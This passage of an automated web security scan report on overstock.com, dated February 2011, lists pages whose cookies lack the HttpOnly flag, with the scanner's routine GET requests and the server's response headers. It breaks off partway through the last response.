P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 120311

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

3.8. http://www.overstock.com/Home-Garden/Chairs/2737/subcat.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Chairs/2737/subcat.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Chairs/2737/subcat.html?TID=R:MOD_A2 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:45 GMT
Server: Apache
Set-Cookie: SSLB=A; path=/; domain=www.overstock.com; expires=Mon, 14-Mar-2011 16:33:45 GMT
Set-Cookie: SSID=AwA56CkAAAAAPbVWTfySCQE9tVZNAQA9tVZNAAAAAGlDfk09tVZNAQDsAAAAhA4AAAM; path=/; domain=www.overstock.com; expires=Sun, 12-Feb-2012 16:28:45 GMT
Set-Cookie: SSSC=2.G5572840862532604668.1.236.3716; path=/; domain=www.overstock.com
Set-Cookie: SSRT=PbVWTQE; path=/; domain=www.overstock.com; expires=Sun, 12-Feb-2012 16:28:45 GMT
Expires: Thu, 20 May 2010 20:50:16 GMT
Pragma: no-cache
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Content-Type: text/html;charset=iso-8859-1
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:45 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/Chairs/2737/subcat.html|searchhistory^categories; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Sitespect: true
Keep-Alive: timeout=5, max=197
Connection: Keep-Alive
Content-Length: 248320

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

3.9. http://www.overstock.com/Home-Garden/Furniture/32/dept.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Furniture/32/dept.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Furniture/32/dept.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:42 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:42 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:42 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/Furniture/32/dept.html|searchhistory^categories; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 272829

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

3.10. http://www.overstock.com/Home-Garden/Furniture/Clearance,/clearance,/32/dept.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Furniture/Clearance,/clearance,/32/dept.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Furniture/Clearance,/clearance,/32/dept.html?sort=Top+Secret&TID=R:MOD_B HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:45 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:45 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:45 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session="sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/Furniture/Clearance%2C/clearance%2C/32/dept.html%3Fsort%3DTop%2BSecret|searchhistory^categories,clearance"; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=48
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 234760

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

3.11. http://www.overstock.com/Home-Garden/Furniture/Simmons,/brand,/32/dept.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Furniture/Simmons,/brand,/32/dept.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Furniture/Simmons,/brand,/32/dept.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:45 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:45 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session="sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/Furniture/Simmons%2C/brand%2C/32/dept.html|searchhistory^categories,brand"; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:45 GMT; Path=/
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 167181

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

3.12. http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html?IID=prod3348501&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:30:02 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:30:02 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:02 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3348501|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:02 GMT; Path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 137959

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

3.13. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html?IID=prod3867484&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:57 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:57 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:57 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=3867484|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:57 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=9
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 135092

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

3.14. http://www.overstock.com/Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html?IID=prod4092961&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:30:00 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:30:00 GMT
Pragma: no-cache
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:00 GMT; Path=/
Set-Cookie: mxcproclicks=4092961|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:00 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 130342

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

3.15. http://www.overstock.com/Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html?IID=prod2552133&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:30:47 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:30:47 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=2552133|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:47 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:47 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=64
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 136806

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

3.16. http://www.overstock.com/cart  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /cart

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cart HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:38 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:38 GMT
Pragma: no-cache
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:38 GMT; Path=/
Set-Cookie: clubogiftcards=; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=29
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 55916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.c
...[SNIP]...

3.17. http://www.overstock.com/Clothing-Shoes/Tailorbyrd-Mens-V-neck-Argyle-Wool-Sweater/4822008/product.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Tailorbyrd-Mens-V-neck-Argyle-Wool-Sweater/4822008/product.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Clothing-Shoes/Tailorbyrd-Mens-V-neck-Argyle-Wool-Sweater/4822008/product.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:32:06 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:32:06 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4822008|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:32:06 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:32:06 GMT; Path=/
